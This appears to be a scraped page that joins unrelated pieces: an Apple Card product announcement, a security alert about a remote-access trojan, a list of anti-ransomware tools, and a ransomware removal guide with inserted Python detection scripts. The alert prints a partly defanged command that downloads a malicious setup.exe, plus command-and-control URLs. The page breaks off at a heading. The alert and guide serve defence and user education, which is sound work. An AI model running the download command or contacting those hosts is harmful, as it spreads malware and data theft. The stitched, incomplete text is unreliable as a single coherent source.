Apple Announces ‘Apple Card’ Credit Card With Daily Rewards, Simplified Statements, and No Fees

Apple revealed a brand new service called “Apple Card,” a new digital and physical credit card that users will be able to sign up for right from their iPhone. Apple says this sign-up process takes just a few minutes and then they can start using the Apple Card right away in stores, in apps, or online worldwide. Apple partnered with Goldman Sachs and Mastercard for Apple Card.

After spending, Apple Card will give users simple real-time views of their latest transactions and balance in the Wallet app. Apple Card uses machine learning and Apple Maps to label transactions with merchant names and locations. Purchases are then automatically totaled and color coded through categories like Food and Drinks, Shopping and Entertainment, and more. 

At the end of each week and month, the Wallet app will show what users spent to help visualize their past finances. The company will also provide 24/7 customer support through Messages. 

Anyone who uses Apple Card will receive a percentage of every purchase amount back as “Daily Cash,” the card’s rewards program. Every time users pay with Apple Card they will receive 2 percent Daily Cash back, and if they make a purchase directly with Apple they’ll get 3 percent Daily Cash back. Daily Cash is immediately added to the user’s Apple Cash card in the Wallet app, and can be used anywhere Apple Pay is accepted. 

Apple Card has no fees associated with it, and the company says that “Apple Card’s goal is to provide interest rates that are among the lowest in the industry and if a customer misses a payment, they will not be charged a penalty rate.” 

As with Apple’s other services, the company promises that Apple Card is completely secure and private. 

A unique card number is created on iPhone for Apple Card and stored safely in the device’s Secure Element, a special security chip used by Apple Pay. Every purchase is secure because it is authorized with Face ID or Touch ID and a one-time unique dynamic security code. The unique security and privacy architecture created for Apple Card means Apple doesn’t know where a customer shopped, what they bought or how much they paid.

There will also be a physical Apple Card for shopping at locations where Apple Pay is not accepted. The card is made out of titanium, has no card number, no CVV, no expiration date, and requires no signature. 

Apple Card launches in the United States this summer.

Security Alert: Malware Hides in Script Injection, Bypassing AV Detection

Spam campaigns deliver a RAT to infect various blogs and websites

We all know that cybercriminals never stop looking for creative ways to launch more targeted attacks that need a smaller infrastructure to carry out, giving them easy access to users’ most valuable data.

Security researchers recently observed and analyzed various spam campaigns in which online criminals were trying to infect multiple commercial blogs and insecure Content Management Systems (CMS).

How the infection spreads (technical details explained)

In the analyzed spam campaigns, the attackers bait victims by trying to inject malicious scripts whose main purpose is to run the following payload (sanitized for your own safety) on users’ machines:

cmd /c cd %Public% & @echo AmmEiqWkls = “”https://gullgas.weebly[.]com/uploads/1/2/3/0/123060154/setup.exe”

This particular “setup.exe” is a malicious file which is hidden in the Nullsoft Scriptable Install System (NSIS) package. This technique isn’t new, because we have seen it in previous spam campaigns, but it’s notable how malicious actors improve the way they “pack” malicious code to deliver malware.

If the executable file is dropped on the infected machines, cybercriminals can collect sensitive information, such as the IP address, MAC address, manufacturer details, country name, name and ID of the operating system, CPUID or hard disk serial number. This data is stored in a JavaScript object which is converted into JSON and then added to text strings.

Once attackers can remotely access the victim’s Windows machine, they will install the malicious executable file as follows:

msiexec.exe in C:\Documents and Settings\[user account]\Local Settings\Application Data\Downloaded Installations\{374BE032-0D10-4FAE-9C8E-BAC1B936896F}\Setup12.msi “SETUPEXEDIR =” C: “SETUPEXENAME

All the data is then protected using this “UnqiueKeyGenerate.Encrypt (name)” function.

In the next step, the backdoor is copied to C:\ProgramData in the Windows Update folder. It then checks for an Internet connection so that it can connect to the following C&C servers (sanitized for your own protection):

  • http://18.218.2[.]135/service1.svc/applyingpoliciesrules/
  • http://18.218.2[.]135/service1.svc/getInfoAfterInstall

After that, all data is accessed through these C&C servers, and the communication process is encrypted with a special key.

The main target of this type of attack is to exfiltrate data from compromised systems and to open a backdoor which allows online criminals to feed more malware into the targeted machines.

Heimdal Security proactively blocked these infected domains, so all Thor Home and Thor Enterprise users are protected.

According to VirusTotal, NO antivirus product out of 68 products has managed to detect this .exe file as malicious at the time we write this security alert.
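Because no antivirus engine flagged the file, network logs are the practical place to look for this campaign. The Python below is an added example, not code from the alert or from Heimdal: it normalises the defanged indicators quoted above and grades each proxy log request as an exact, host-only or path-only match. The log format, timestamps, client addresses and the 203.0.113.9 host are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Indicators as the alert prints them (defanged, with the page's stray spacing).
PAGE_INDICATORS = [
    "https: //gullgas.weebly [.] com / uploads / 1/2/3/0/123060154 / setup.exe",
    "http: //18.218.2 [.] 135 / service1.svc / applyingpoliciesrules /",
    "http: //18.218.2 [.] 135 / service1.svc / getInfoAfterInstall",
]


def refang(indicator):
    """Undo defanging in memory only, so the value can be compared with logs."""
    s = re.sub(r"\s+", "", indicator).replace("[.]", ".")
    return re.sub(r"^hxxp", "http", s, flags=re.I)


def normalize(url):
    """Return (host, path), lowercased, without query string or trailing slash."""
    parts = urlsplit(refang(url))
    return (parts.hostname or "").lower(), parts.path.rstrip("/").lower()


IOC_PAIRS = {normalize(i) for i in PAGE_INDICATORS}
IOC_HOSTS = {host for host, _ in IOC_PAIRS}
IOC_PATHS = {path for _, path in IOC_PAIRS}

# Constructed log format (assumption): timestamp client method url status
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def classify(url):
    """Grade one requested URL against the indicators."""
    host, path = normalize(url)
    if (host, path) in IOC_PAIRS:
        return "exact"   # same server, same resource
    if host in IOC_HOSTS:
        return "host"    # any other request to a listed server
    if path in IOC_PATHS:
        return "path"    # same endpoint on another server: C&C may have moved
    return None


def scan(lines):
    """Return one record per matching log line; malformed lines are skipped."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        verdict = classify(m["url"])
        if verdict:
            hits.append({"line": number, "ts": m["ts"],
                         "client": m["client"], "match": verdict})
    return hits


def clients_to_triage(hits):
    """Map each client to its strongest match (exact > host > path)."""
    order = {"exact": 0, "host": 1, "path": 2}
    best = {}
    for hit in hits:
        current = best.get(hit["client"])
        if current is None or order[hit["match"]] < order[current]:
            best[hit["client"]] = hit["match"]
    return best


# Constructed sample log; matching URLs are built from the page's indicators.
_payload, _c2_policy, _c2_info = (refang(i) for i in PAGE_INDICATORS)
_c2_host = normalize(_c2_info)[0]
SAMPLE_LOG = [
    "2019-03-26T10:01:58Z 10.0.4.17 GET https://example.com/uploads/setup.exe 200",
    f"2019-03-26T10:02:11Z 10.0.4.17 GET {_payload} 200",
    f"2019-03-26T10:02:40Z 10.0.4.17 GET http://{_c2_host}/favicon.ico 404",
    f"2019-03-26T10:03:05Z 10.0.4.22 POST {_c2_info}?id=1 200",
    "2019-03-26T10:04:19Z 10.0.4.30 POST http://203.0.113.9/service1.svc/getInfoAfterInstall 200",
    "truncated line without the expected fields",
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(hit["line"], hit["ts"], hit["client"], hit["match"])
    print(clients_to_triage(found))
```

A path-only match is the weakest signal, but it is the one that still fires if the operators move the same service to a new address.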

Apply these basic security measures to protect yourself against malicious script injections

The main issue with this particular type of malware is that it went undetected by traditional antivirus products. By injecting a malicious script, hackers can redirect users to compromised sites/ servers and steal users’ most sensitive data.

This is why we strongly recommend our users to:

  • Keep the operating system and all apps and software programs fully patched, with the newest updates available.
  • Be very careful when clicking on suspicious links or websites and always check if the web page’s URL is genuine;
  • Make sure you access only sites that have a security certificate or HTTPS to avoid malware infection;
  • Consider using a proactive cybersecurity software solution to enhance online protection;
  • Prevention is always the best cure, so we strongly recommend checking out these actionable and free educational resources to gain more knowledge in the cybersecurity industry, and better spot online threats.

8 Free Anti-Ransomware Tools To Remove And Prevent CryptoLocker Virus

How to remove a WannaCry ransomware? All victims have to do is download WanaKiwi tool from Github and run it on their affected Windows computer using the command line (cmd). Ransomware is as scary as it sounds. Hackers use this technique to lock you out of your devices and demand a ransom in return for access.

Ransomware puts you in a sticky situation, so it’s best to know how to avoid it. Ransomware is a specific type of malicious software that has been designed to force users to pay the ransom — usually in the form of Bitcoin — by encrypting data or locking the screen. There are ways users can protect their data against ransomware attacks. This begins with the right security software but does not end there. Regular, offsite backups with the external hard disk not connected to the computer are probably the better prevention.

Free Anti-Ransomware Tools To Remove And Prevent CryptoLocker Virus

Hundreds if not thousands of ransomware families now dominate the playing field, infecting both Microsoft Windows and Apple macOSX. But they’re not all created equal. Here are 10 strains that made some of the biggest waves in 2016. The Top 10 Ransomware Strains of 2016 / 2017 are – CryptoWall, SamSam, Jigsaw, Chimera, Petya and Mischa, Cerber, CryLocker, HDDCryptor, TeslaCrypt and Locky.

↓ 01 – Bitdefender Anti-Ransomware Tool

Bitdefender Anti-Ransomware is a free security tool that can protect against existing and emerging ransomware attacks. Ransomware is a category of malicious software designed to block access to your computer and files until you pay a large sum of money. Download our advanced ransomware vaccine right now to stay safe from losing your money or files. Bitdefender Anti-Ransomware is a free security tool that offers next-gen protection against the CTB-Locker, Locky, Petya, and TeslaCrypt ransomware families by keeping your files safe from encryption in a simple and non-intrusive way. Works great on Microsoft’s Windows 10 and Apple’s macOS.

  • Completely free for download and use
  • Next-gen ransomware protection against CTB-Locker, Locky, Petya and TeslaCrypt ransomware families
  • Keeps your files safe from encryption
  • Non-intrusive and easy to use

↓ 02 – Malwarebytes Anti-Ransomware

Malwarebytes Anti-Ransomware uses advanced proactive technology that monitors what ransomware is doing and stops it cold before it even touches your files. It has no shot at encrypting. And it does not rely on signatures or heuristics, so it’s light and completely compatible with antivirus.

These methods proved to be so successful at stopping ransomware that Malwarebytes Anti-Ransomware detected all of the latest and most dangerous ransomware variants right out of development and into beta 1. This means when running Malwarebytes Anti-Ransomware, you do not have to worry about getting infected by CryptoLocker, CryptoWall, or CTBLocker. Better yet, it can defeat new ransomware the moment it is released, proactively protecting you from ransomware that’s never even been seen before.

↓ 03 – CryptoPrevent

CryptoPrevent is a robust anti-virus/anti-malware software supplement, filling a huge gap that exists with traditional security solutions to provide protection against a growing multitude of new and emerging ransomware and other malicious software threats. CryptoPrevent Malware Prevention is the original CryptoLocker prevention tool you’ve read about, designed to prevent infection from the first “ransomware” threat which emerged in late 2013, encrypting valuable data on the infected PC and offering decryption in exchange for large payment.

  • Folder Watch – Monitors and protects common folders from items that match malware definitions.
  • Submit Malicious Files – This will allow you to submit malicious files (which are not in our malware definitions) to review for inclusion in the default definitions.
  • HoneyPot Ransomware Protection – Very effective in preventing new and unknown ransomware from encrypting your files! When malicious activity is detected ALL non-essential programs are terminated, stopping malicious software dead in its tracks.
  • KillEmAll v5 Integrations – Based on the new code platform of the coming 3rd generation ‘d7x’ PC technician utilities, KillEmAll v5 allows for fast termination of non-essential programs including malware and ransomware, and is integrated into the new Tray Icon along with other useful features!

↓ 04 – Trend Micro Ransomware Screen Unlocker

Ransomware is a type of malware that prevents or limits users from accessing their system. This type of malware forces its victims to pay the ransom through certain methods in order to grant access to their systems, or to get their data back. There are two types of ransomware: Lock Screen, which limits users from accessing the computer, and Crypto (File Encryption), which encrypts files to limit users from accessing their files. Trend Micro™ Ransomware Screen Unlocker Tool is designed to eliminate Lock Screen ransomware from your infected PC.

↓ 05 – RansomFree by Cybereason

RansomFree is a free software by Cybereason for detection and blocking of 99% of ransomware types. By putting multiple deception methods in place, RansomFree detects ransomware as soon as encryption occurs either on a computer or network drive. Once encryption is detected, RansomFree suspends it, displays a popup that warns users their files are at risk and enables them to stop the attack.

↓ 06 – GridinSoft Anti-Ransomware

Hackers and cybercriminals are developing new ways to infect computers, and they are more harmful than all viruses which you’ve seen before. Without any protection, your system is helpless against the modern cryptolockers. You can lose all important files unexpectedly. And GridinSoft Anti-Ransomware is absolutely free. So what are you waiting for? Get this awesome tool and protect your PC from cryptor threats. GridinSoft Anti-Ransomware works as a vaccine for your computer. When protection is enabled, the ransomware bypasses your computer.

↓ 07 – Kaspersky Anti-Ransomware Tool

Companies of all sizes are being targeted by cybercriminals, who encrypt and hold their data ‘hostage’ until a ransom is paid. Cybercriminals don’t sit still; they’re always developing new techniques and tools to hold businesses and their data to ransom. Kaspersky Anti-Ransomware Tool for Business offers complimentary security to protect corporate users from ransomware. It identifies ransomware behavior patterns and protects Windows-based endpoints effectively.

↓ 08 – NeuShield Data Sentinel Free

Traditional ransomware protection is able to detect and block known malware and viruses. Even with constant updates, however, it’s often not effective in stopping new or unknown attacks. NeuShield Data Sentinel’s patent pending Mirror Shielding™ technology adds a layer of protection to your existing antivirus software, allowing you to instantly recover critical files from any ransomware attack without a backup.

  • Mirror Shielding – Protects data against ransomware, targeted, zero-day, and unknown threats attempting to encrypt or lock your files
  • Boot Protection – Prevents ransomware from making your system unable to boot
  • Disk Wipe Protection – Blocks wipers from removing or destroying all data on your hard drive
  • My Documents and Desktop Folder Protection – Protects files in the My Documents and desktop folders

What ransomware is and how to prevent and remove it

Ransomware is a particularly invasive form of malware that typically takes over a victim’s data or device and holds it hostage until a sum of money is handed over to secure its release.

Ransomware essentially involves digital extortion where malware holds files or computer systems hostage until the victim pays a fee. Ransomware is popular with an increasing number of cybercriminals, likely due to its ease of implementation and high return on investment. Add to this the advent of cryptocurrency, which has made it easier for attackers to get away with their crimes. According to Daniel Tobok, CEO of Cytelligence Inc., a cybersecurity and ransomware removal company, “Ransomware is really the weapon of choice for a criminal. They can see us but we can’t see them.”

Ransomware can be costly for individuals, but can be especially harmful to businesses. It’s estimated that total damages to businesses in the United States due to ransomware totalled $5 billion in 2017 alone. Damages may include costs involved in paying ransoms, losing data, paying professional services to try to recover data, downtime during attacks, loss of customers after attacks, and more.

The best way to reduce the threat of ransomware is to prevent it being installed in the first place. But if you do fall victim, you have options. In this guide, we explain what ransomware is and how to prevent and remove it. We focus on practical methods that you can employ that emphasize removal over paying the ransom, which we strongly discourage.

What is ransomware and how does it work?

Part of taking the fear out of ransomware involves understanding how it actually works. As former UN Secretary-General Kofi Annan once said, “Knowledge is power. Information is liberating.”

Ransomware is similar to some other forms of malware, with an added bit of extortion. Ransomware is a category of malware, but there are also different types of ransomware. It penetrates computer systems in the same manner as other forms of malware. For example, you might:

  • Download it from a malicious email attachment or link
  • Load it onto your machine from a USB flash drive or DVD
  • Download it while visiting a corrupted website

Once it’s on your system, the ransomware shuts down select system functions or denies access to files. In the case of Windows machines, it usually disables your ability to access the start menu (that way you can’t access antivirus programs or try to revert to Safe Mode).

A staple of many types of ransomware is encryption. The ransomware encrypts files on your device so they cannot be opened without a password. To get the password, you must pay a ransom to the attacker.

Any file can be encrypted with ransomware, although most ransomware won’t attempt to encrypt all types of files. Common targets include image files, PDFs, and any type of file created by Microsoft Office (such as Excel and Word files). The common method ransomware will use is to search for files on common drives and encrypt any or most files it finds there. Some newer forms of encrypting ransomware have even taken to encrypting network shared files as well, a dangerous development for businesses in particular.

Until you clear the virus from your machine (or pay the demanded ransom and hope the criminal clears it for you), you won’t have access to those files. Some ransomware will even demand that you pay up within a certain amount of time, or else the files will stay locked forever or the virus will completely wipe your hard drive.

Why is ransomware so effective?

Whichever method the program uses to penetrate your system, ransomware is designed to hide itself by pretending to be something it’s not, even changing file names or paths to make your computer and antivirus software overlook suspicious files. The key difference between ransomware and other forms of malware is that the purpose of ransomware extends beyond just mischief or stealthily stealing personal information.

If anything, ransomware acts more like a bull in a china shop once it has effectively found its way onto your system. Unlike many other viruses, which are often designed around stealth both before and after invading your system, ransomware designers want you to know the program is there.

After the program is installed, it completely takes over your system in such a way that you’ll be forced to pay attention to it. It’s a very different modus operandi than virus designers have traditionally followed, and it appears to be the most effective money-making virus design to date.

Ransomware works through fear, intimidation, shame, and guilt. Once the program is there, it begins a negative campaign of emotional manipulation to get you to pay the ransom. Far too often those fear tactics work, especially on individuals who don’t realize that there are alternatives to paying up.

According to a 2016 Malwarebytes survey of large businesses affected by ransomware, 40 percent of victims paid the ransom, while an IBM survey of small- to medium- sized businesses in the same year reported a much higher rate of 70 percent.

Types of ransomware

Ransomware has been around since the 1980s, but many attacks today use ransomware based on the more modern Cryptolocker trojan. File-encrypting ransomware is increasingly the most common type. However, according to Malwarebytes, there are several categories of ransomware that you may still encounter:

Encrypting ransomware

If ransomware finds its way onto your machine, it’s likely going to be of the encrypting variety. Encrypting ransomware is quickly becoming the most common type due to a high return on investment for the cybercriminals using it, and how difficult it is to crack the encryption or remove the malware.

Encrypting ransomware will completely encrypt the files on your system and disallow you access until you’ve paid a ransom, typically in the form of Bitcoin. Some of these programs are also time-sensitive and will start deleting files until the ransom is paid, increasing the sense of urgency to pay up.

On this type of ransomware, Adam Kujawa, Head of Intelligence at Malwarebytes, had this to say: “It’s too late once you get infected. Game over.”

Online backup can be a great help in recovering encrypted files. Most online backup services include versioning, so you can access previous versions of files rather than the encrypted ones.

Scareware

Scareware is malware that attempts to persuade you that you have a computer virus that needs removal right away. It will then try to get you to clear the virus by buying a suspicious and typically fake malware or virus removal program. Scareware is highly uncommon these days, but some of these viruses do still exist out in the wild. Many target mobile phones.

Scareware doesn’t encrypt files, although it may attempt to block your access to some programs (such as virus scanners and removers). Nevertheless, scareware is the easiest to get rid of. In fact, in most cases, you can remove scareware using standard virus removal programs or other methods without even entering Safe Mode (although this may still be necessary or recommended).

Screen locker (or lock-screen viruses)

Screen lockers will put up a warning screen that limits your ability to access computer functions and files. These can be installed onto your machine or exist within a web browser. They’ll typically come with a message claiming to represent a law enforcement organization and carry a message saying you’ll face severe legal consequences if you do not pay a fine immediately.

You might end up downloading a lock-screen virus via a number of different ways, including visiting compromised websites or by clicking on and downloading an infected file contained in an email. When installed directly onto a computer, you may have to perform a hard reboot, although you may also find that you’re still greeted with the screen lock message even when the operating system loads up again.

Screen lockers tend to lock you out of your menu and other system settings, but don’t completely remove access to your files. This means some of the malware’s primary attack methods prevent you from easily accessing your virus removal software, and at times may even prevent you from restarting your computer from the user interface.

Screen lockers are another good reason why having online backup is extremely important. While the screen locker won’t encrypt or delete your files, you may find yourself forced to perform a system restore. The system restore may not delete your important files, but it will return them to an earlier state. Depending on the restored states, that may still result in a lot of lost data or progress. Regular online backups will help prevent data loss that performing a system restore does not guarantee, especially if the virus has been hiding on your system for much longer than you realized.

How to prevent ransomware

Decrypting files encrypted with ransomware is incredibly difficult. Most ransomware these days will use AES or RSA encryption methods, both of which can be incredibly difficult to crack. To put it in perspective, the US government also uses AES encryption standards for classified documents. Information on how to create this kind of encryption is widely known, as is the difficulty in cracking it. Until someone realizes the dream of quantum computing, brute-force cracking for AES is effectively impossible.

This being the case, the best method to fight ransomware is never allowing it to get onto your system in the first place. Protection can be accomplished by shoring up weak areas and changing behaviors that typically allow ransomware to get onto your system. Here are some best practices to follow to prevent ransomware:

  • Invest in solid data backup. This is hard to overstate. Data backup is the single best thing you can do. Even if you do get hit by ransomware, having effective and consistent data backup means your data will be safe, regardless of which type of ransomware you’re attacked with.
  • Invest in effective antivirus software. In this case, you don’t just want malware or virus cleaners, but software that will actively monitor and alert you to threats, including inside web browsers. That way, you’ll get notifications for suspicious links, or get redirected away from malicious websites where ransomware may be housed.
  • Never click on suspicious email links. Most ransomware spreads through email. When you make it a habit of never clicking on suspicious links, you significantly lower your risk of downloading ransomware and other viruses.
  • Protect network-connected computers. Some ransomware works by actively scanning networks and accessing any connected computers that allow remote access. Make sure any computers on your network have remote access disabled or utilize strong protection methods to avoid easy access.
  • Keep software up to date. Updates to Windows and other operating systems and applications often patch known security vulnerabilities. Updating in a timely manner can help lower the risk of susceptibility to malware, including ransomware.

What to do if you catch ransomware mid-encryption

Encryption is a resource-intensive process that consumes a lot of computational power. If you’re lucky, you may be able to catch ransomware mid-encryption. This takes a keen eye and knowing what unusually large amounts of activity look and sound like on your computer. Ransomware encryption will happen in the background, so it’s almost impossible to detect this actually occurring unless you’re specifically looking for it.

Additionally, the virus doing the encryption will likely be hiding inside another program, or have an altered file name that is made to look innocuous, so you might not be able to tell which program is performing the action. However, should you discover what you think is a ransomware virus encrypting files, here are a couple of options:

Place your computer into hibernation

This will stop any running processes and create a quick memory image of your computer and files. Do not restart your computer or take it out of hibernation. In this mode, a computer specialist (either from your IT department or a hired security company) can mount the device to another computer in a read-only mode and assess the situation. That includes the recovery of unencrypted files.

Suspend the encryption operation

If you can identify which operation is the culprit, you may want to suspend that operation.

In Windows, this involves opening up the Task Manager and looking for suspicious operations. In particular, look for operations that appear to be doing a lot of writing to the disk.

You can suspend operations from there. It’s better to suspend the operation instead of killing it, as this allows you to investigate the process in more detail to see what it’s actually up to. That way you can better determine whether you have ransomware on your hands.

If you do find that it’s ransomware, check which files the process has been focusing on. You may find it in the process of encrypting certain files. You can copy these files before the encryption process has finished and move them to a secure location.
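The Task Manager procedure above can also be scripted. The Python below is an added example, not part of the original guide: it samples per-process write counters twice, ranks processes by bytes written per second, and can suspend (not kill) one PID and list the files it has open. It assumes the third-party psutil package is installed; the sampling window, rate threshold and `--suspend` argument are choices made for this example.

```python
import sys
import time

WINDOW_SECONDS = 5      # sampling window (assumption for this example)
MIN_RATE = 1_000_000    # bytes per second worth a closer look (assumption)


def snapshot():
    """Return {pid: (name, cumulative bytes written)} using psutil."""
    import psutil  # third-party; imported here so the ranking logic has no dependency
    snap = {}
    for proc in psutil.process_iter(["pid", "name"]):
        try:
            written = proc.io_counters().write_bytes
        except (psutil.AccessDenied, psutil.NoSuchProcess):
            continue  # protected or already exited; run elevated to see more
        snap[proc.info["pid"]] = (proc.info["name"] or "?", written)
    return snap


def rank_writers(before, after, seconds, min_rate=MIN_RATE):
    """Rank processes by write rate between two snapshots, heaviest first."""
    rows = []
    for pid, (name, written) in after.items():
        baseline = 0  # a process that started inside the window counts from zero
        if pid in before and before[pid][0] == name and before[pid][1] <= written:
            baseline = before[pid][1]
        # Otherwise the PID is new or was reused by another program.
        rate = (written - baseline) / seconds
        if rate >= min_rate:
            rows.append((pid, name, rate))
    return sorted(rows, key=lambda row: row[2], reverse=True)


def suspend_and_list_files(pid):
    """Suspend the process and return the paths it currently has open.

    psutil.Process(pid).resume() undoes the suspension if the process
    turns out to be legitimate (a backup job, an installer, a sync client).
    """
    import psutil
    proc = psutil.Process(pid)
    proc.suspend()
    try:
        return [f.path for f in proc.open_files()]
    except psutil.AccessDenied:
        return []


if __name__ == "__main__":
    first = snapshot()
    time.sleep(WINDOW_SECONDS)
    for pid, name, rate in rank_writers(first, snapshot(), WINDOW_SECONDS):
        print(f"{pid:>7}  {rate / 1e6:8.1f} MB/s  {name}")
    if len(sys.argv) == 3 and sys.argv[1] == "--suspend":
        for path in suspend_and_list_files(int(sys.argv[2])):
            print("open:", path)
```

A high write rate alone does not identify ransomware; the open-file list after suspension is what shows whether the process is working through documents.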

You can find some other great suggestions by security and computer professionals on Stack Exchange.

Ransomware removal: How to remove scareware and screen lockers (lock-screen viruses)

Screen lockers are more troublesome to remove than scareware, but are not as much of a problem as file-encrypting ransomware. Scareware and lock-screen viruses are not perfect and can often be easily removed at little to no cost. You have two main options:

  1. Perform a full system scan using a reputable on-demand malware cleaner
  2. Perform a system restore to a point before the scareware or screen locker began popping up messages.

Let’s look at both of these in detail:

Option 1: Perform a full system scan

This is a fairly simple process, but before performing a system scan, it’s important to choose a reputable on-demand malware cleaner. One such cleaner is Zemana Anti-Malware, or Windows users could even use the built-in Windows Defender tool.

To perform the full system scan using Zemana Anti-Malware, do the following:

  • Open your Zemana Anti-Malware home screen.
  • Click on the Gear Symbol on the top right to access settings.
  • Click on Scan on the left.
  • Select Create Restore Point.
  • Return to the home screen and click on the green Scan button on the bottom right.

Setting the restore point is a good best practice for virus scans in general. Meanwhile, your virus scan might tag some things as problems that aren’t problems (Chrome extensions often come up as problematic, for example), while you could find areas of concern that you weren’t expecting.

In my case, a recent Zemana system scan revealed a potential DNS hijack. Yikes! (It also misclassified a few programs as malware and adware, so be careful and make sure to check which files you’re cleaning and quarantining properly.)

To perform a full system scan using Windows Defender, do the following:

  • Perform a quick system search for “Windows Defender.”
  • Access Windows Defender and select Full on the right side.
  • Click on Scan.

Microsoft continually improves its built-in Windows antivirus software, but it’s not as good a solution as an on-demand option like Zemana or many other high-quality programs. You could choose to run two programs to cover your bases, but note that they can’t be run concurrently.

When dealing with screen-locking ransomware, you may need to enter Safe Mode to get the on-demand virus removers to work or to run your system restore properly. Even some scareware can at times prevent you from opening your virus removal programs, but they usually can’t prevent you from doing so while you’re in Safe Mode. If you’re having trouble getting your computer to restart in Safe Mode (a distinct possibility if you have a screen locker), check out our guide on How to Start Windows in Safe Mode.

Option 2: Perform a system restore

Another option is to perform a system restore to a point before the scareware or screen locker began popping up messages. Note that this option assumes that you have your computer set to create system restore points at preset intervals, or that you’ve performed this action yourself manually. If you’re accessing this guide as a preventative measure against ransomware, creating restore points from this point forward will be a good idea.

Here’s how to find your restore points or set new restore points in Windows:

  • Access your Control Panel (you can do this through a system search for “Control Panel”).
  • Click on System and Security.
  • Click on System.
  • Go to Advanced system settings.
  • Click on the System Protection tab and select System Restore.
  • If you have never run a system backup, click on Set up backup. This will open up the backup operations and get you started. Once there, you’ll need to pick your backup location, the files you want to be backed up (or you can let Windows select those for you), schedule when you want your backups to occur, and then perform the backup.
  • If it shows that you already have a backup in place, select the backup files from the most recent restore point or from whichever restore point you desire.

The backup restoration process may take several minutes, especially if the amount of data being restored is significant. However, this should restore your file system to a point before the virus was downloaded and installed.

Note that both a scan and a restore can have delayed reaction times, so it’s a good idea to do both.

Indiana University also provides a helpful knowledge base with a few advanced methods for more troublesome scareware. We also recommend checking out our Complete Guide to Windows Malware and Prevention. It will walk you through the process of malware removal and what that process looks like with several different programs.

Ransomware removal: How to remove file encrypting ransomware

Once encrypting ransomware gets onto your system, you’re in trouble if you want to keep any unsaved data or anything that hasn’t been backed up (at least without paying through the nose for it). Surprisingly, many cyber criminals are fairly honorable when it comes to releasing the encryption after they’ve received payment. After all, if they never did, people wouldn’t pay the ransom. Still, there is a chance that you could pay the ransom and find your files never released, or have the criminals ask for more money.

That being said, if you’re hit with a nasty piece of encrypting ransomware, don’t panic. Alongside that, do not pay the ransom. You have two alternative options for ransomware removal:

  • Hire a professional ransomware removal service: If you have the budget to hire a professional and deem recovering your files worth the money, then this might be the best course of action. Many companies, including Proven Data Recovery and Cytelligence, specialize in providing ransomware removal services. Note that some charge even if the removal is unsuccessful, while others don’t.
  • Try to remove the ransomware yourself: This is typically free to do and may be a better option if you don’t have the funds to hire a professional. Recovering your files yourself will typically involve first removing the malware and then using a tool to decrypt your files.

If you’d like to try to resolve the issue yourself, here are the steps to take:

Step 1: Run an antivirus or malware remover to get rid of the encryption virus

Refer back to the malware/virus removal instructions provided in the scareware/screen locker removal section above. The removal process in this step will be the same, with one exception: WE STRONGLY ENCOURAGE YOU TO REMOVE THIS VIRUS IN SAFE MODE WITHOUT NETWORKING.

There is a chance that the file-encrypting ransomware you’ve contracted has also compromised your network connection, so it’s best to cut off the hackers’ access to the data feed when removing the virus. Note that this may not be wise if you’re dealing with a few variants of the WannaCry ransomware, which check against a gibberish website to identify a potential killswitch. If those sites are registered (which they are now), the ransomware halts encryption. This situation is highly uncommon, however.

Removing the malware is an important first step to deal with this problem. Many reliable programs will work in this case, but not every antivirus program is designed to remove the type of malware that encrypts files. You can verify the effectiveness of the malware removal program by searching its website or contacting customer support.

The real problem you will find is that your files will stay encrypted even after you remove the virus. However, trying to decrypt files without removing the malware first may result in the files getting re-encrypted.

Step 2: Try to decrypt your files using a free ransomware decryption tool

Again, you should be doing everything you can to avoid paying a ransom. Your next step is going to be to try a ransomware decryption tool. Note, however, that there is no guarantee that there will be a ransomware decryption tool that will work with your specific malware. This is because you may have a variant that has yet to be cracked.

Kaspersky Labs and several other security companies operate a website called No More Ransom! where anyone can download and install ransomware decryptors.

Kaspersky also offers free ransomware decryptors on its website.

First, we suggest you use the No More Ransom Crypto Sheriff tool to assess what type of ransomware you have and whether a decryptor currently exists to help decrypt your files. It works like this:

  • Select and upload two encrypted files from your PC.
  • Provide a website or email address given in the ransom demand, for example, where the ransomware is directing you to go to pay the ransom.
  • If no email address or website is given, upload the .txt or .html file with the ransom note.

The Crypto Sheriff will process that information against its database to determine if a solution exists. If no suggestion is offered, don’t give up just yet, however. One of the decryptors may still work, although you might have to download each and every one. This will be an admittedly slow and arduous process, but it could be worth it to see those files decrypted.

The full suite of decryption tools can be found under the Decryption Tools tab on the No More Ransom! website.

Running the file decryptors is actually pretty easy. Most of the decryptors come with a how-to guide from the tool’s developer (most are from EmsiSoft, Kaspersky Labs, Check Point, or Trend Micro). Each process may be slightly different, so you’ll want to read the PDF how-to guide for each one where available.

Here’s an example of the process you’d take to decrypt the Philadelphia ransomware:

  • Choose one encrypted file on your system and a version of that file that’s currently unencrypted (from a backup). Place these two files in their own folder on your computer.
  • Download the Philadelphia decryptor and move the executable to the same folder as your paired files.
  • Select the file pair and then drag and drop the files onto the decryptor executable. The decryptor will then begin to determine the correct keys needed to decrypt the file.
  • This process may take quite a lot of time, depending on the complexity of the program.
  • Once completed, you will receive the decryption key for all files encrypted by the ransomware.
  • The decryptor will then ask you to accept a license agreement and provide you the options for which drives to decrypt files from. You can change the location depending on where the files are currently housed, as well as some other options that may be necessary, depending on the type of ransomware. One of those options usually includes the ability to keep the encrypted files.
  • You will get a message in the decryptor UI once the files have been decrypted.

Again, this process may not work, as you may have ransomware for which no decryptor is available. Many individuals who do get infected simply pay the ransom without looking into removal methods, so many of these ransomware are still used, despite having been cracked.

Backup option: Wipe your system and perform a complete data restoration from a data backup

Steps 1 and 2 only work when used together. If either fails to work for you, you’ll need to follow this step. Hopefully, you have a solid and reliable data backup already in place. If so, don’t give in to the temptation to pay the ransom. Instead, wipe your system and restore your files through your online or physical backup system, either yourself or, preferably, with the help of an IT professional.

This is also a reason why bare-metal backup and restoration is important. There’s a good chance your IT professional may need to perform the complete bare-metal restoration for you. This not only includes your personal files, but your operating system, settings, and programs as well. Windows users may also need to consider a complete system reset to factory settings. Microsoft provides an explanation for multiple system and file restoration methods and options.

The history of ransomware

